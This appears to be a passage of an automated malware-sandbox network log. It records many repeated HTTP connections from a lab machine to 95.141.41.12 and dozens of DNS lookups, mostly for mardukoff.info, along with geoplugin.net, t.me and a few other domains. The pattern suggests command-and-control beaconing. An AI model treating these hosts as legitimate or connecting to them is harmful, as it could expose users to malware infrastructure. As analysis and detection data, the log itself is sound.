Sep 28, 2023 06:05:02.122773886 CEST	50334	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.123150110 CEST	50336	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.313410997 CEST	80	50334	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:02.313597918 CEST	50334	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.328164101 CEST	80	50336	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:02.328253984 CEST	50336	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.328470945 CEST	50336	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.533782005 CEST	80	50336	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:02.535161018 CEST	80	50336	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:02.535233974 CEST	50336	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.623162031 CEST	50336	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.623708010 CEST	50337	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.811222076 CEST	80	50337	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:02.811602116 CEST	50337	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.828351021 CEST	80	50336	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:02.828680992 CEST	50336	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:02.908453941 CEST	50337	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.095980883 CEST	80	50337	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:03.097210884 CEST	80	50337	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:03.097387075 CEST	50337	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.185841084 CEST	50337	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.186070919 CEST	50338	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.373256922 CEST	80	50337	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:03.373446941 CEST	50337	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.391455889 CEST	80	50338	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:03.391663074 CEST	50338	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.462937117 CEST	50338	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.668337107 CEST	80	50338	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:03.673352003 CEST	80	50338	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:03.673517942 CEST	50338	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.763504028 CEST	50338	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.764009953 CEST	50340	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.960889101 CEST	80	50340	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:03.961316109 CEST	50340	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.961316109 CEST	50340	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:03.969547033 CEST	80	50338	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:03.969727039 CEST	50338	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.157898903 CEST	80	50340	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:04.164271116 CEST	80	50340	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:04.164616108 CEST	50340	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.247675896 CEST	50340	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.248328924 CEST	50341	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.436044931 CEST	80	50341	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:04.436290979 CEST	50341	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.436472893 CEST	50341	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.444262028 CEST	80	50340	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:04.444554090 CEST	50340	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.625607967 CEST	80	50341	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:04.630086899 CEST	80	50341	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:04.630234957 CEST	50341	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.716007948 CEST	50341	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.716479063 CEST	50342	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.903759003 CEST	80	50341	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:04.903975010 CEST	50341	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.912468910 CEST	80	50342	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:04.912750006 CEST	50342	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:04.912846088 CEST	50342	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.109010935 CEST	80	50342	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:05.114547014 CEST	80	50342	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:05.114805937 CEST	50342	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.200926065 CEST	50342	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.201112032 CEST	50344	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.398427010 CEST	80	50342	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:05.398727894 CEST	50342	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.405541897 CEST	80	50344	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:05.405644894 CEST	50344	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.405817032 CEST	50344	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.609824896 CEST	80	50344	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:05.614609003 CEST	80	50344	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:05.614773989 CEST	50344	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.700726032 CEST	50344	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.701261044 CEST	50345	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.895771027 CEST	80	50345	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:05.896030903 CEST	50345	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.896342993 CEST	50345	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:05.904939890 CEST	80	50344	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:05.905121088 CEST	50344	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.090128899 CEST	80	50345	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:06.091195107 CEST	80	50345	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:06.091255903 CEST	50345	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.185337067 CEST	50345	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.185831070 CEST	50346	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.370924950 CEST	80	50346	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:06.371289015 CEST	50346	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.371575117 CEST	50346	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.378803015 CEST	80	50345	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:06.379081011 CEST	50345	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.556160927 CEST	80	50346	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:06.561403990 CEST	80	50346	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:06.561664104 CEST	50346	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.657908916 CEST	50346	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.658214092 CEST	50348	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.841938972 CEST	80	50346	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:06.842289925 CEST	50346	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.858695030 CEST	80	50348	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:06.858964920 CEST	50348	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:06.859090090 CEST	50348	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.059341908 CEST	80	50348	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:07.064208984 CEST	80	50348	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:07.064466000 CEST	50348	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.154020071 CEST	50348	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.154320955 CEST	50349	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.351196051 CEST	80	50349	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:07.351421118 CEST	50349	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.351593018 CEST	50349	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.354394913 CEST	80	50348	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:07.354655027 CEST	50348	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.549310923 CEST	80	50349	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:07.556077957 CEST	80	50349	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:07.556374073 CEST	50349	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.639066935 CEST	50349	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.639390945 CEST	50350	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.829901934 CEST	80	50350	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:07.830108881 CEST	50350	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.830233097 CEST	50350	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:07.836430073 CEST	80	50349	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:07.836502075 CEST	50349	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.020445108 CEST	80	50350	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:08.025269985 CEST	80	50350	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:08.025576115 CEST	50350	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.107280970 CEST	50350	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.107589006 CEST	50352	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.297703028 CEST	80	50350	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:08.297919989 CEST	50350	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.302018881 CEST	80	50352	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:08.302301884 CEST	50352	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.302382946 CEST	50352	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.497183084 CEST	80	50352	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:08.502104998 CEST	80	50352	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:08.502394915 CEST	50352	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.591459036 CEST	50352	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.591722012 CEST	50353	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.786370039 CEST	80	50352	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:08.786689043 CEST	50352	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.793385029 CEST	80	50353	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:08.793567896 CEST	50353	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.793756008 CEST	50353	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:08.995229959 CEST	80	50353	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.000294924 CEST	80	50353	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.000530005 CEST	50353	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.091686010 CEST	50353	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.092223883 CEST	50354	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.278995991 CEST	80	50354	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.279381037 CEST	50354	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.279381990 CEST	50354	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.293026924 CEST	80	50353	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.293303967 CEST	50353	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.466278076 CEST	80	50354	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.471210003 CEST	80	50354	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.471549988 CEST	50354	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.560283899 CEST	50354	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.560513020 CEST	50355	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.747725010 CEST	80	50354	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.748023033 CEST	50354	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.754426956 CEST	80	50355	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.754538059 CEST	50355	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.754693031 CEST	50355	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:09.948396921 CEST	80	50355	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.953906059 CEST	80	50355	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:09.954205036 CEST	50355	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.044509888 CEST	50355	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.044933081 CEST	50357	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.232302904 CEST	80	50357	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:10.232690096 CEST	50357	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.232729912 CEST	50357	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.238558054 CEST	80	50355	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:10.238895893 CEST	50355	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.420012951 CEST	80	50357	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:10.425874949 CEST	80	50357	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:10.425987959 CEST	50357	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.513591051 CEST	50357	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.514036894 CEST	50358	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.702049971 CEST	80	50357	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:10.702279091 CEST	50357	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.710922956 CEST	80	50358	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:10.711236954 CEST	50358	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.711322069 CEST	50358	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.908210993 CEST	80	50358	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:10.912713051 CEST	80	50358	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:10.912796021 CEST	50358	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.997669935 CEST	50358	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:10.997905970 CEST	50359	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.192121029 CEST	80	50359	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:11.192349911 CEST	50359	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.192435980 CEST	50359	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.194894075 CEST	80	50358	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:11.195086002 CEST	50358	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.386634111 CEST	80	50359	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:11.391191959 CEST	80	50359	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:11.391268969 CEST	50359	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.481981993 CEST	50359	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.482399940 CEST	50361	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.673311949 CEST	80	50361	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:11.673422098 CEST	50361	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.673583031 CEST	50361	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.676054001 CEST	80	50359	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:11.676229954 CEST	50359	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.864239931 CEST	80	50361	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:11.866707087 CEST	80	50361	95.141.41.12	192.168.2.3
Sep 28, 2023 06:05:11.866900921 CEST	50361	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.950654030 CEST	50361	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:11.950997114 CEST	50362	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:05:12.141524076 CEST	80	50361	95.141.41.12	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 28, 2023 06:01:51.913273096 CEST	192.168.2.3	8.8.8.8	0x6e27	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:52.322094917 CEST	192.168.2.3	8.8.8.8	0x46ab	Standard query (0)	transdi.org	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:54.298491955 CEST	192.168.2.3	8.8.8.8	0xe929	Standard query (0)	pixcode.com.mx	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:56.128799915 CEST	192.168.2.3	8.8.8.8	0xca3b	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:56.829381943 CEST	192.168.2.3	8.8.8.8	0x1f55	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:01:57.362481117 CEST	192.168.2.3	8.8.8.8	0x994b	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:00.661344051 CEST	192.168.2.3	8.8.8.8	0x6dd5	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:04.414673090 CEST	192.168.2.3	8.8.8.8	0x3651	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:05.418850899 CEST	192.168.2.3	8.8.8.8	0x3651	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:08.323580027 CEST	192.168.2.3	8.8.8.8	0x8bfb	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:10.932049036 CEST	192.168.2.3	8.8.8.8	0x3694	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:14.680577993 CEST	192.168.2.3	8.8.8.8	0x3528	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:15.684405088 CEST	192.168.2.3	8.8.8.8	0x3528	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:18.291830063 CEST	192.168.2.3	8.8.8.8	0xfcaf	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:20.910119057 CEST	192.168.2.3	8.8.8.8	0x7ac0	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:24.661358118 CEST	192.168.2.3	8.8.8.8	0xe04a	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:28.413966894 CEST	192.168.2.3	8.8.8.8	0x4b09	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:31.021256924 CEST	192.168.2.3	8.8.8.8	0xb189	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:33.657877922 CEST	192.168.2.3	8.8.8.8	0x6c84	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:36.281214952 CEST	192.168.2.3	8.8.8.8	0xe732	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:38.904067993 CEST	192.168.2.3	8.8.8.8	0x47ca	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:41.676569939 CEST	192.168.2.3	8.8.8.8	0x18a7	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:44.302740097 CEST	192.168.2.3	8.8.8.8	0x28d8	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:46.946325064 CEST	192.168.2.3	8.8.8.8	0xb5ac	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:49.576992989 CEST	192.168.2.3	8.8.8.8	0x2e35	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:52.208522081 CEST	192.168.2.3	8.8.8.8	0xf82b	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:54.835913897 CEST	192.168.2.3	8.8.8.8	0x3285	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:57.505244970 CEST	192.168.2.3	8.8.8.8	0xa25d	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:02:58.992515087 CEST	192.168.2.3	8.8.8.8	0x6f37	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:00.475613117 CEST	192.168.2.3	8.8.8.8	0x195b	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:02.014281034 CEST	192.168.2.3	8.8.8.8	0xff6	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:03.516491890 CEST	192.168.2.3	8.8.8.8	0xc405	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:05.005858898 CEST	192.168.2.3	8.8.8.8	0x5a02	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:06.473185062 CEST	192.168.2.3	8.8.8.8	0x2970	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:07.959367990 CEST	192.168.2.3	8.8.8.8	0xf89	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:08.965435982 CEST	192.168.2.3	8.8.8.8	0xf89	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:09.981151104 CEST	192.168.2.3	8.8.8.8	0xf89	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:11.476001024 CEST	192.168.2.3	8.8.8.8	0x4c23	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:12.959315062 CEST	192.168.2.3	8.8.8.8	0x283e	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:14.429656029 CEST	192.168.2.3	8.8.8.8	0xc869	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:16.021245956 CEST	192.168.2.3	8.8.8.8	0xe632	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:17.521954060 CEST	192.168.2.3	8.8.8.8	0x14e9	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:19.154333115 CEST	192.168.2.3	8.8.8.8	0xbc07	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:20.708077908 CEST	192.168.2.3	8.8.8.8	0xa0e4	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:22.255918026 CEST	192.168.2.3	8.8.8.8	0x55ac	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:23.755639076 CEST	192.168.2.3	8.8.8.8	0xd80e	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:25.317950964 CEST	192.168.2.3	8.8.8.8	0xb566	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:26.816870928 CEST	192.168.2.3	8.8.8.8	0xbdd2	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:28.459275007 CEST	192.168.2.3	8.8.8.8	0x8e36	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:29.958141088 CEST	192.168.2.3	8.8.8.8	0xeca0	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:31.520169973 CEST	192.168.2.3	8.8.8.8	0xbdb4	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:33.145133018 CEST	192.168.2.3	8.8.8.8	0x5060	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:34.816813946 CEST	192.168.2.3	8.8.8.8	0xca41	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:36.317078114 CEST	192.168.2.3	8.8.8.8	0xad8c	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:37.968913078 CEST	192.168.2.3	8.8.8.8	0xeb06	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:39.614444017 CEST	192.168.2.3	8.8.8.8	0x33d2	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:41.145749092 CEST	192.168.2.3	8.8.8.8	0x3797	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:42.755068064 CEST	192.168.2.3	8.8.8.8	0x7ac3	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:44.457655907 CEST	192.168.2.3	8.8.8.8	0x8c28	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:45.959677935 CEST	192.168.2.3	8.8.8.8	0xa8ab	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:47.520441055 CEST	192.168.2.3	8.8.8.8	0x5507	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:49.145426035 CEST	192.168.2.3	8.8.8.8	0x9770	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:50.707705021 CEST	192.168.2.3	8.8.8.8	0x4b70	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:52.254549026 CEST	192.168.2.3	8.8.8.8	0xe8d1	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:53.756706953 CEST	192.168.2.3	8.8.8.8	0xc646	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:55.316945076 CEST	192.168.2.3	8.8.8.8	0x95c6	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:56.957318068 CEST	192.168.2.3	8.8.8.8	0x814e	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:03:58.542382956 CEST	192.168.2.3	8.8.8.8	0xd1ec	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:00.206012011 CEST	192.168.2.3	8.8.8.8	0xbade	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:00.675966978 CEST	192.168.2.3	8.8.8.8	0xf42a	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:02.204997063 CEST	192.168.2.3	8.8.8.8	0xe795	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
Sep 28, 2023 06:04:03.215066910 CEST	192.168.2.3	8.8.8.8	0xe795	Standard query (0)	mardukoff.info	A (IP address)	IN (0x0001)	false
